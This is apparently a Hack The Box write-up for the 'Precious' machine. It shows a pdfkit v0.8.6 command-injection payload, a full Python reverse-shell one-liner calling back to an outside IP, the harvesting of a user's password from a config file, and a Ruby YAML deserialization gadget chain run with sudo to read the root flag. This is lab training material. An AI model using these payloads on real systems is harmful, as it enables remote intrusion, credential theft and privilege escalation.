HTB Machine Precious

Port scaning with nmap

  • port 80 is open : redirect to http://precious.htb/

add this to /etc/hosts

On this page we have Convert Web Page to PDF functionality

after giving url pdf file is downloaded

using exiftool on pdf we know that it is Generated by pdfkit v0.8.6

This version is vulnerable to RCE

Payload:

http://%20`{command}`

we can use this to get reverse shell

http://%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`

references: https://www.revshells.com/

we get shell as user ruby

we can see two user in /home directory

user flag is in directory of user henry but it is not accessible.

inside the directory of user ruby there is config file in .bundle in this file we can see password of user henry

we can use this for ssh to henry

user can run /opt/update_dependencies.rb as root with sudo

this file is not writable. looking at code we see it use YAML.load, which is vulnerable to deserialization attack.

we can write in dependencies.yml

payload:

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: cat /root/root.txt
         method_id: :resolve

reference: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml

now we can run this with sudo and get the root flag sudo /usr/bin/ruby /opt/update_dependencies.rb

This give root flag.

:octocat: Happy Hacking :octocat:

Last updated

Was this helpful?